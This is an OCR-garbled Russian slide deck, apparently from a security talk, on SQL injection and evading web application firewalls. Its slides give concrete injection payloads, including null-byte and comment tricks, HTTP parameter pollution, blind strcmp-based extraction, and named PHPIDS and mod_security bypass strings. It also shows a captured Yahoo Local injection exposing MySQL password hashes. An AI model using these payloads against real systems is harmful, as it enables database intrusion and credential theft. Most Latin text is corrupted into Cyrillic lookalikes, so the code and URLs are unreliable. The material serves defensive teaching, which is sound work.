/?ісІ=(1)ог(0х50=0х50) 







Методы обхода фильтров безопасности (3) 


ѵ Использовать пиІІ-Ьуіе для обхода бинарно-зависимых 
функций 

» Пример: Щегед (" Л (.К 1 /3}$", $_СЕТ['рагаітГ])) { ... > 

/?рагат = 123 

егед (" Л (.){1,3}$", "123") - Іше 
/?рагат = 1234 

егед (" Л (.){1,3}$", "1234") - Гаізе 

/?рагат = 1 + ипіоп+5еІес1+1 

егед (" Л (.){1,3}$", "1 ипіоп зеіесі 1") - ^аізе 

/?рагат = 123%00 

егед (" Л (.){1,3}$", "123\0") - Ігие 

/?рагат = 1/*%00*/ипіоп+5еІес1+1 

егед (" Л (.){1,3}$", "1/*\0*/ипіоп &еІес( 1") - Ігие 







Методы обхода фильтров безопасности (4) 


Обход функции асІсІвІавГіевО 

V Это возможно, если существует уязвимость, позволяющая 
установить кодировку §Л5, ВІ65 или СВК 

ш Как это работает? 


* асІсІзІазІіезС"") т.е. 0x27 вернет " т.е. Ох >с27 

• Пример для кодировки СВК: 

• 0хЬТ27 - некорректный символ 

• ОхЬ75с - корректный, самостоятельный символ 

• после обработки функцией асІсІзІазІіезО 0хЬ?27 превращается в 
0хЬ75с27 т.е. 0хМ5с и одинарную кавычку 0x27 

ВагОг, И(1р://га20г.пате/ѵиІпегаЬіІі(іез/зяІ-іпексіі-§ѵуа2аппуе-§-тиІ(іЬаі1оѵуті-косІігоѵкаті-і- 
агігізІазНез/ 







Методы обхода фильтров безопасности (5) 


Пример распространенной уязвимости в функциях фильтров 
безопасности 

• Следующий запрос не позволяет провести атаку 

/?ісІ = 1+ипіоп+5еІес1+ 1,2,3/* 

• Если в фильтре есть соответствующая уязвимость, то такой запрос 
успешно отработает 

/?ісІ = 1+ип/**/іоп+5еІ/**/ес1+ 1,2,3-- 

• 5(2І_-запрос примет вид 

8ЕІ.ЕСТ * Ггот ІаЫе ѵѵііеге ісі =1 ипіоп зеіесі 1,2,3— 

V Вместо конструкции 1**1 может использоваться любые наборы символов, 
вырезаемые фильтром (ец #####, %00, еіс) 

V Данный пример работает в случае «излишней очистки» поступающих 
данных (замена гедехр-выражения на пустую строку) 





Часть 5: Методы обхода ѴѴеЬ Арріісаііоп РігеѵѵаІІ 



Методы обхода ѴѴеЬ Арріісаііоп РігеѵѵаІІ (ѴѴАР) 













Что такое ѴѴАР 


ННр://зегѵег/?ісІ=6329&ргіпІ=Ѵ 


Нас атакуют! 
Ахтунг!!! 




ИНр://зегѵег/?ісІ=5351 


ННр://зегѵег/?ісІ=8234 



ѴѴеЬзегѵег 




ИНр://зегѵег/?ісІ=1+ипіоп+зеІесІ... 

ИНр://зегѵег/?ісІ=“><5сгір1>... 

ННр://зегѵег/?ісІ=/../../../еІс/раззѵѵсІ 


Нормализация данных 

Оесосіе НТМІ. епШіез (е.д. &#99;, &циоІ;, &#хАА;) 
ЕзсаресІ сНагасІегз (е.д. \1, \001, \хАА, \иААВВ) 
ІЧиІІ Ьуіе зігіпд Іегтіпаііоп 

Поиск сигнатуры 

/(зеІ)(есІ.+іг)(от)/із 

/(ипі)(оп.+зеІ)(есІ)/із 


















Какие они бывают 


По режиму работы: 

• Мост/Маршрутизатор 

• Обратный прокси-сервер 

• Встроенный 

По модели защиты: 

• Основанный на сигнатуре (Бідпаіиге-ЬазесІ) 

• Основанный на правилах (КиІе-ЬазесІ) 

По реакции на «плохой» запрос: 

• Очистка «опасных» данных 

• Блокировка запроса 

• Блокировка источника атаки 





Методы обхода ѴѴАР 


* Фундаментальные ограничения технологии 

• Неспособность полностью защитить ѴѴеЬ-приложение от всех 
возможных уязвимостей 

V Общие проблемы 

• Разработчикам универсальных фильтров ѴѴАР приходиться 
балансировать между эффективностью фильтра и 
минимизацией ошибок блокировки легитимного трафика 

• Обработка возвращаемого трафика клиенту 

Ир Уязвимости реализации 

• Технологии нормализации запроса 

• Использование новых техник эксплуатации уязвимостей в 
ѴѴеЬ (НТТР Рагатеіег РоМиііоп, НТТР Рагатеіег Ргадтепіаііоп, 
замена пиІІ-ЬуІе и т.п.) 









Практика обхода ѴѴАР: 5<2І_ Іпіесііоп - нормализация 


ѵ Пример уязвимости в функции нормализации запроса 

• Следующий запрос не позволяет провести атаку 
/?ісІ = 1+ипіоп+5еІесі+ 1,2,3/* 

• Если в ѴѴАР есть соответствующая уязвимость, то такой запрос успешно 
отработает 

/?Іс1 = 1/*ипіоп*/ипіоп/*5еІес1*/5еІесІ+ 1,2,3/* 

• После обработки ѴѴАР запрос примет следующий вид 
іпс!ех.рІір?ісІ = 1/*ипі X оп*/ипіоп/*5еІ X есі*/5еІесі+ 1,2,3/* 

V Данный пример работает в случае «очистки» опасного трафика, а 
не при блокировке всего запроса или источника атаки 






Практика обхода ѴѴАР: 5<2І_ Іпіесііоп - НРР (пример 1) 


ш Использование НТТР Рагатеіег РоІІиІіоп (НРР) 

• Следующий запрос не позволяет провести атаку 
/7ісІ = 1;5еІесІ+1,2,3+Ггот+и5ег5+ѵѵІіеге+ісІ = 1-- 

• Такой запрос успешно отработает при использовании НРР 
/7ісІ = 1;5еІесІ+1&ісІ = 2,3+7гот+и5ег5+ѵѵНеге+ісІ = 1~ 

И 1 Успешное проведение атаки НРР по обходу ѴѴАР ограничено 
используемой средой атакуемого приложения 

в ОѴѴА5Р ЕІІ09 Ьиса СагеНопі, ЗіеТапо йіРаоІа 

ИПр://ѵѵѵѵѵѵ.оѵѵа5р.огд/ітаде5/Ь/Ьа/Арр5есЕІІ09_СагеІІопіОіРаоІа_ѵ0.8. 

рсИ 









Практика обхода ѴѴАР: НТТР Рагатеіег РоІІиііоп (НРР) 


Мр://туЗесигеАрр/сіЬ.сді?раг=<РауІоасМ>&раг=<РауІоас)_2> 












Практика обхода ѴѴАР: НТТР Рагатеіег РоІІиііоп (НРР) 


Технология/Среда 

Интерпретация параметров 

Пример 

А5Р.ЫЕТ/ІІ5 

Склеивание через запятую 

раг1=ѵаІ1,ѵаІ2 

А5Р/ІІ5 

Склеивание через запятую 

раг1=ѵаІ1,ѵаІ2 

РНР/АРАСНЕ 

Последний параметр результирующий 

раг1=ѵаІ2 

РНР/2еиз 

Последний параметр результирующий 

раг1=ѵаІ2 

15Р, Зегѵіеі/Арасіпе Тотсаі 

Первый параметр результирующий 

раг1=ѵаІ1 

15Р,5егѵІе1:/ОгасІе Арріісаііоп Зегѵег 1 Од 

Первый параметр результирующий 

раг1=ѵаІ1 

15Р,5егѵІе1:/1е1:1:у 

Первый параметр результирующий 

раг1=ѵаІ1 

ІВМ І_о1:и5 Оотіпо 

Первый параметр результирующий 

раг1=ѵаІ1 

ІВМ НТТР Зегѵег 

Последний параметр результирующий 

раг1=ѵаІ2 

тосІ_регІ,ІіЬаред2/АрасІпе 

Первый параметр результирующий 

раг1=ѵаІ1 

РегІ ССІ/АрасМе 

Первый параметр результирующий 

раг1=ѵаІ1 

тос1_регІ,ІіЬ???/АрасІпе 

Первый параметр результирующий 

раг1=ѵаІ1 

тосі_ѵѵ5ді (РуТИоп)/АрасТіе 

Возвращается массив 

АК.КАѴ(0х8Ь9058с) 

РуіІпіп/2оре 

Первый параметр результирующий 

раг1=ѵаІ1 

ІсеѴѴагр 

Возвращается массив 

['ѵаііуѵаіг'] 

АХІ5 2400 

Последний параметр результирующий 

раг1=ѵаІ2 

ипкзуз ѴѴІгеІе55-С РТ2 Іпіегпеі Сатега 

Склеивание через запятую 

раг1=ѵаІ1,ѵаІ2 

РісоМ АЛсіо 1022 Ргіпіег 

Последний параметр результирующий 

раг1=ѵаІ2 

ѵѵеЬсатХР Рго 

Первый параметр результирующий 

раг1=ѵаІ1 

ОВМап 

Склеивание через две тильды 

раг1=ѵаІ1~~ѵаІ2 











Практика обхода ѴѴАР: 5<2І- Іпіесііоп - НРР (пример 2) 


ѵ Использование НТТР Рагатеіег РоІІиІіоп (НРР) 

• Уязвимый код 

ЗС^І-^'зеІес* кеу ?гот ІаЫе ѵѵііеге Іс1 = "+Ре^ие5*.^ие^у5^^іпд("ісі ,, ) 

• Такой запрос успешно отработает при использовании техники НРР 

/ ? ісі = 1 / * * / и п і оп / * &ісі = * / зеI есі/ * &ісі = * / рѵѵсі / * &ісі = * / іг от / * &і 
сІ = */и5ег5 

• 5(2І_ запрос примет вид 
зеіесі кеу ?гот (аЫе ѵѵііеге 

ісІ = 1/**/ипіоп/*,*/5еІес*/*,*/рѵѵсІ/*,*/?гот/*,*/и5ег5 

в І_аѵакитаг Киррап, Нир://Іаѵакитаг.сот/ЗрІіІ_апсі_і1оіп.рсИ 







Практика обхода ѴѴАР: 5<2І_ Іпіесііоп - НРР 


№ Использование НТТР Рагатеіег Ргадтепіаііоп (НРР) 

• Пример уязвимого кода 

<2иегу( м 5еІесІ * Ігот ІаЫе ѵѵИеге а = ".$_СЕТ[ , а']." апсі Ь=".$_6ЕТ[ , Ь']); 

<2иегу( м 5еІесІ * Ггот ІаЫе ѵѵИеге а = ".$_6ЕТ[ , а , ]. м апсі Ь= ,, .$_СЕТ[ , Ь']." Іітіі 
,, .$_6ЕТ[ , с']); 

• Следующий запрос не позволяет провести атаку 
/?а = 1+ипіоп+5еІесІ+1,2/* 

• Используя НРР, такие запросы могут успешно отработать 
/?а = 1+ипіоп/*&Ь=*/5еІесІ+1,2 

/?а = 1+итоп/*&Ь=*/5е1ес1+1,ра55/*&е=*/^гот + и5ег5-- 

• 5(2І_-запросы принимают вид 

зеіесі * Гг от ІаЫе ѵѵИеге а = 1 ипіоп/* апсі Ь=*/зеІесІ 1,2 

зеіесі * Ггот ІаЫе ѵѵИеге а = 1 ипіоп/* апсі Ь=*/5еІесІ 1,раз5/* Іітіі */1гот изегз— 
ИНр://сІеѵІееѵ.Ыод5ро1.сот/2009/09/ИіІр-рагатеІег-^гадтепІаІіоп-ИрГ-ѵѵеЬ.ІіІт1 






Практика обхода ѴѴАР: ВІіпа 5<2І- ІпіесІІоп 


Использование логических запросов АМР и ОГС 
• Следующий запрос для многих ѴѴАР позволяет успешно провести атаку 
/?ісІ = 1+(Ж+0х50 = 0х50 

/7ісІ = 1+апсІ+а5СІі(Іоѵѵег(тісІ((5еІесІ+рѵѵсІ+^гот+и5ег5+ІітіІ:+1,1),1,1))) = 74 

Вместо знака равенства может использоваться отрицание или неравенство 

(!=, <>, <, >) - Парадокс! Но многие ѴѴАР это пропускают. 

Заменяя функции 5(2І_, которые попадают в сигнатуры ѴѴАР, на их 
синонимы, становится возможным эксплуатировать уязвимость методом 
ЫіпсІ-5(21- Іпіесііоп 

зиЬзігіпдО -> тісІ(), 8иЬзіг(), еіс 

азсііО -> Иех(), Ьіп(), е*с 

ЬепсИтагкО -> зІеер() 

Данный пример справедлив для всех ѴѴАР, разработчики которых 
стремятся охватить как можно больше ѴѴеЬ-приложений 





Практика обхода ѴѴАР: ВІіпс) 5<2І- Іпіесііоп 


Ж Известные: 

5иЬ5ігіпд((5еІесі ’ра55ѵѵогсГ),1,1) = 0x70 
5иЬ5іг((5еІес1: ’ра55ѵѵогсГ)Д,1) = 0x70 
шісІ((5еІесі 'ра55ѵѵогсГ),1,1) = 0x70 
Ж Новые: 

5Ігстр(ІеЛ('ра55ѵѵогсГД), 0x69) = 1 
5Ігстр(ІеЛ('ра55ѵѵогсГД), 0x70) = 0 
5Ігстр(ІеЛ('ра55ѵѵогсГД), 0x71) = -1 

5ТКСМР(ехрг1,ехрг2) возвращает 0, если последовательности равны, -1, 
если первый аргумент меньше второго, и 1 - в противном случае. 

ННр://сІеѵ.ту8ЯІ.сот/сІос/ге?тап/5.0/еп/зігіпд-сотрагізоп- 

ГипсііопБ.ІіІтІ 





Практика обхода ѴѴАР: ВІіпсІ 5<2І- Іпіесііоп 


ВІіпсІ 5(2І_ Іпіесііоп - это не всегда использование АМР и ОК! 

• Примеры уязвимого кода 

Риегу("$еІес( * 7гот ІаЫе ѵѵНеге иісI = ".$_6ЕТ[ , иісI , ]); 

Риегу("зеІесІ * ?гот ІаЫе ѵѵНеге сагсІ=".$_6ЕТ[ , сагсГ]); 

• Пример эксплуатации 

Таіве: іпсІех.рГір?иісІ=8ігстр(ІеЛ:((8еІес1:+Ііа8Іі+?гот+и8ег8+ІітН:+0,1),1),0х42)%2В112233 
Таіве: іпсІех.рІір?иісІ=8Ігстр(ІеП:((8еІес1:+Ііа8Іі+?гот+іі8ег8+ІітН:+0,1),1),0х61)%2В112233 
(те: іпс!ех.рІір?иісІ=8Ігстр(Іе?1((веІесІ+Ііа8Іі+?гот+и8ег8+ІітН:+0,1),1),0х62)%2В112233 
первый символ Ііазіі = В 

Гаіве: ... 

?аІ5е: іпс!ех.рЬр?иісІ=5Ігстр(Іе1 : 1((5еІесІ/**/Ііа5Іі/**/Тгот/**/и5ег5/**/Іітіі/**/0,1),2),0х6240)%2В112233 
Ігие: іпс!ех.рІір?иіс1=5Ігстр(Іе?1((5еІесІ/**/Ііа5Іі/**/^і'от/**/и5ег5/**/ІігпИ:/**/0,1),2),0х6241)%2В112233 
второй символ НазГі = А 

И а г И 


К Ьа46881 Ь5с47Ь062с8сОЗсЮсІЬ620914 





Практика обхода ѴѴАР: 5<2І- Іпіесііоп - РНРШ5 


■» РНРЮ5 (0.6.1.1) 

Ругается на: /?ісІ = 1+ипіоп+5еІесІ:+и5ег,ра55ѵѵогсІ+^гот+ту5ЯІ.и5ег+ѵѵНеге+и5ег=1 
Но пропускает: /?ІсІ = 1+ипіоп+5еІесІ+и5ег / ра55ѵѵогсІ+Тгот+ту5ЯІ.и5ег+ІіппИ;+0Д 

Ругается на: /?ісІ = 1+ОК+1 = 1 
Но пропускает: /?ісІ = 1+ОК+0х50=0х50 

Ругается на: /?ісІ=5иЬ5І:гіпд((1)ДД) 

Но пропускает: /?ісі = плісі((1)ДД) 





Практика обхода ѴѴАР: 5<2І- Іпіесііоп - МосІ_5есигіІу 


» МосІ_5есигі*у (2.5.9) 

Ругается на: 

/7ісІ = 1+апсІ+а5Сіі(Іоѵѵег(5иЬ5І:гіпд((5еІесІ:+рѵѵсІ+^гот+и5ег5+Ііппі1:+1,1),1,1))) = 74 
Но пропускает: 

/?ісІ = 1+апсІ+а5Сіі(Іоѵѵег(плісІ((5еІесІ:+рѵѵсІ+^гот+и5ег5+ІіппіІ:+1,1),1,1))) = 74 

Ругается на: /?ісІ = 1+ОК+1 = 1 
Но пропускает: /?ісІ = 1+ОК+0х50=0х50 

Ругается на: /?ісІ = 1+апсІ+5=б 
Но пропускает: /?ісІ = 1+апсІ+5!=6 

Ругается на: /?ісІ = 1;сІгор тетЬегз 
Но пропускает: /7ісІ = 1;сІеІеІ:е тетЬегз 





Автоматизированный поиск 5(21. Іпіесііоп 


ѵ Поиск 5<2І- Іпіесііоп с помощью МахРаІгоІ 


Параметры 


Анализатор скриптов 

[71 Поиск уязвимостей в СЕТ запросах 


[71 Поиск уязвимостей в Р05Т запросах 
5 [У] Сложная проверка прикладных скриптов 
:> [у] Сложная проверка прикладных скриптов (всех) 



[71 5(21. инъекция 
[71 Удаленное выполнение команд 
[У] Просмотр произвольных файлов 
[71 Межсайтовый скриптинг (Х55) 

[71 5егѵег Бісіе ІпсЫез (551) 

[71 НТТР Резропзе 5рІі№пд 

[71 Выполнение кода, взятого с удаленного сервера 

Методы поиска 

Поиск уязвимостей в полях запроса 

[7] Ке%ег 
[71 ІІзег-АдепІ 
[71 Соокіе 


! • 5(21. Цесііоп [Начался: 30.10.2009 19:04, длился 00:54:26] 







Навигатор 


Узел ▼ Сортировка ▼ Команды ▼ 
192.168.0.51 
+ Зузіет 

80 /*ф- НТТР 

- ♦ 5(2 1. инъекция _ 

+• ІЕЯЕШП1Ш?!В1УЯ 

♦ 192.168.0. 51/іпсіех.рЬр 

♦ Возможна атака Алб Ріппіпд 

■> Доступ к каталогам для просмотра 

♦ Незащищенная передача данных 
О Доступен метод ТРАСЕ 

ѵ Недоступные каталоги 
Ш-Ч> Некорректная обработка ошибок 
0-Ѵ Уязвимая ссылка 
Список форм 
В -# 81 / Іф -НТТР 
-• 8080 /Іф -НТТР 
-• 8585 / Іф - НТТР 
Ѳ -Ф 9191 / Іф - НТТР 
+ ♦ 5<2І. инъекиия 

♦ Возможна атака Алб Ріппіпд 

♦ Доступ к каталогам для просмотра 
В ♦ Межсайтовый скриптинг 

+ Незащищенная передача данных 

♦ Список невидимых ссылок 
Ф Доступен метод ТРАСЕ 

; Ч- Недоступные каталоги 
Ф Ч- Некорректная обработка ошибок 
В-Ф Уязвимая ссылка 
< Список форм 

Ссылки с параметрами 


Информация 


Серьезная уязвимость 

5(21. инъекция 

192.168.0. 51/іп<іех.рЬр 




в Описание 


Возможно выполнение атаки *5(2І. инъекиия*. '5(21. инъекиия* - способ нападения на базу данных в 
обход межсетевой защиты. В этом методе, параметры, передаваемые к базе данных через ѴѴеЬ 
приложения, изменяются таким образом, чтобы изменить выполняемый 501 запрос. Например, 
добавляя различные символы к параметру, можно выполнить дополнительный запрос совместно с 
первым. 

Нападение может использоваться для следующих целей: 

1. Получить доступ к данным, которые обычно недоступны, или получить данные конфигурации 
системы, которые могут использоваться для дальнейших нападений. Например, измененный запрос 
может возвратить хешированные пароли пользователей, которые в последствии могут быть 
расшифрованы методом перебора. 

2. Получить доступ к компьютерам организации, через компьютер, на котором находится база 
данных. Это можно реализовать, используя процедуры базы данных и расширения 361. языка, 
которые позволяют доступ к операционной системе. 

Запрос для выполнения атаки 

Р05Т /іпЬех.рЬр НПР/1.1 
Ной: 192.168.0.51 

ІІзег-АдепІ: МогіІІа/4.0 (сотрабЫе; М5ІЕ 6.0; ѴУіпсіо'Л'5 МТ 7.0) РТХ 
Соппесбоп: СІо$е 

Сопіепі-Туре: аррЙсабоп/х-ѵ«ю» -ІЪгт -игіепсосіесі 
СопіепМепдйі: 32 

Іодіп=І&раззл'оггі ='&5иЬті1=5иЬтіІ 


Результат работы 


2.11 

СопІепІ-ІепдЙі: 172 

Г оппегЪлгѵ гіпср 






















Автоматизированная эксплуатация 5(21- Іпіесііоп 


$ЯІтар (Ийр://5дІтар.5оигсе1 : огде.пеІ;/) 

• Полная поддержка: Му5(2І_, Огасіе, РозІ:дге5(2І_ и Місгозо^ 5(2І_ 
Зегѵег 

• Частичная поддержка: М іегозой Ассезз, ОБ2, ІпіЪгтіх, ЗуЬазе и 
ІпІегЬазе 

в 8ЯІи8 (ІіПірѴ/здІзиз.зоигсеГогде.пеІ:/) 

• Реализована поддержка только Му5(2І_ 

в Ь8 ЯІЬГ-ѵ 2 (ИІ:1:р://сосІе.доодІе.сот/р/Ь5дІЫ : -ѵ2/ 

• Больше ориентирована под слепые 5(2І_-инъекции. Реализована 
поддержка: Му5(2І_, Огасіе, РозІ:дге5(ЗІ_ и Місгозоі'І: 5(2І_ Зегѵег 


в В свете появления новых быстрых техник эксплуатации 
слепых 5(2І_-инъекций в Му5(2І_ планируется выпустить 
соответствующий ргооГ оГ сопсері: (будет доступен на 
Ы:1:р: //ѵѵѵѵѵѵ. тіІѵѵОгт .сот/рарегз/) 































5(21- Іпіесііоп в «живой природе» 


5(2І_ Іп^есііоп можно встретить даже на широко 
известных и крупных Интернет-ресурсах 



^ Нпр://ехр«П5.тісго5ои.(г/ 

* О,- Соодіе 



— 


АЬоиі №і§ііЬог 5 | ѴаЬоо! і-осаі Ыеі§ІіЬог5 - МогіІІа Рігеіох 


Рііе ЕсЙ Ѵіеѵч Нвіогу Воокліагкв ТооІ 5 Неір 

^ V» ЬКр://ІосаІ.уаЬоо.сот/пеідЬЬог 5 /Ьі_аЬои(.рЬр?теіго= 3 +апО+ 1 = 2 +ипіоп+аІІ+ 5 еІесЫ-дгоир_сопса((и 5 ег, ’ [*• ІСН 

Соодіс [ 


иаа 


ѵ] :с ЗеагсЬ • ■ І} ВоокпіаАі- • 


О 5 вшпді’ 


НАСКЕР 


Мею Ывег? Зідп Іір Зідп Іп Неір 

УаНоО! І_ОСАІ_ 


Сеі Ѵаіюо! ТооІЬаг 


ОІѴаРоо! Ы МаіІ Ш О 8^ ^ 

| ѴѴеі 


■і 


Ні Мазіѳг (: Уосіг Зузіѳгп ОѵѵМѳО Ву Тигкізіі Наскѳг 

& гийѳЬОу -I & ТТ>ѳ_Вѳкіг & & АЗИ 

пехі Іа где!: тісгозойоосп 
ТТТНасК.СоМ & 5аѵ5аК.СоМ 


МееіУаЬоо! Ьосаі №і§ЬЪог8 

ТеІІ из ѵѵИеге уои Ііѵе. Епіегуоиг гір сосіе: 
Со 

1.е1 те кпоѵѵ у/Пеп УаПоо! 1-осаІ Ыеідіівога сотез Іо тѵ аіеа 

УаИоо! І_осаІ №ідНЬогз із аѵаіІаЫе іп: 

СІіісадо Агеа 
БаІІав Агеа 
Иеѵу Уогк Агеа 
5асгатепіо. СА 
5ап Ргапсізсо Вау Агеа 


...»ѵЬу доевп'І оиг іоѵ/п Ьаѵе Н’в 
оѵѵп Гагтегз тагкеі? 


...іп деврегаіе пеед о( а до од 
сопігасіог. Сап апуЬоду Ьеір? 


...ѵѵе Ьаѵе орепіпдз іп оиг 
іпіегтедіаіѳ зоссег ргасіісе. 


гооі: 1оса1Ноз1:*652А51 3578Р86732Р10Е714. 
5.1.24-гс-ѴаНоо-5МР-Іод:Ьгіпдіі сіЬ:Ьгіпдіі изег@69.147.І 


Р,гоо1:с1ЬЗ.^^вуаИоо.сот:*652А513Ь/8Р8Ь/32М11Ь/14АУ8Уи4в 


і,гооі:12/.и.0.1:*652/ 


3 


ѴѴНаі із УаИоо! І_осаІ МеідІіЬогз? 

А ргасіісаі сіізсііззіои Ьоаггі Тог апу Іоріс - (гот пеідИЬогИоос) за(е(у іо сопігасіог 
гесоттепсіаііопз. 


Тог 0 І 5 зЫвСІ ипк 5 





































Резюме 


V 5(21. Іпіесііоп - это грубая ошибка в 
программировании, широко распространенная и 
крайне опасная 

V ѴѴАР - это не долгожданная "серебряная пуля" 

• ѴѴАР не устраняет уязвимость, а лишь (частично) 
прикрывает вектор атаки 

• Концептуальные проблемы ѴѴАР - использование 
сигнатурного принципа 

V Правильно выстроенный процесс 5оГСѵѵаге 
□еѵеіортепі: ЫГе Сусіе (50І.С) в значительной степени 
снижает вероятность появления уязвимостей в коде 

V Защита ѴѴеЬ-приложений, также как и 
информационная безопасность в целом, должна быть 
комплексной :) 










Дополнительные материалы и ссылки 


в ѴѴА5С: ИІ:І:р://рго]есІ:5.ѵѵеЬарр5ес.огд/5рЫп]есІ;іоп 

в 0ѴѴА5Р: ИНр://ѵѵѵѵѵѵ.оѵѵа5р.огд/іпсІех.рИр/Брі_Іп]есі:іоп 

в Ресурсы БесигіІіуІаЬ: ІпИр://ѵѵѵѵѵѵ.5есигИ:уІаЬ.ги/ 

в Реп1;е5І:топкеу.пеІ: СИеаі: БИееІз: Мйр://реп^:е5І;топкеу.пе1:/ 
(Огасіе, МББ(2І_, МуБ(2І_, РозІ:дгеБрі_, Іпдгез, 032 , ІпГогпліх) 

” Ресурсы АпйсИаІ:: 

• МуЗС^І- >=4.х: Ы;1:р5:/Догит.ап1:1с11а1:.гиЛ11геас1пау43966-1-10.Ы:т1 

• МуЗС^І- 3.x: Ы;1:р:/Догит.ап1:1с11а1:.ги/5ИоМИгеас1.р11р?1:=20127 

• М55(ЗІ_: М1:ф://{Ъгит.ап1:ісМа^ги/Шгеагі15087.М1:тІ 

• ОРАСІ-Е: И1;1;р:/Догит.ап1;ісІіа1:.ги/5Иоѵѵ1:Іігеасі.рІір?1:=40576 

• РозІ:дге5(ЗІ_: Ы;1;рѴ/І'огит.ап!;ісІпа1;.ги/1:Іпгеас135599.Ы:тІ 

• МЗАссезз: Іі1:ф://1Ъгит.ап1:ісІіа^ги/Шгеасі50550.Іі1:тІ 









Спасибо за внимание! 


сІеѵІееѵ@рІ5есигіІу.ги 

ННр://сІеѵіееѵ.Ыод8роі.сот/ 


РОЗІТІѴЕ ТЕСНМСИ-ОБІЕ5 



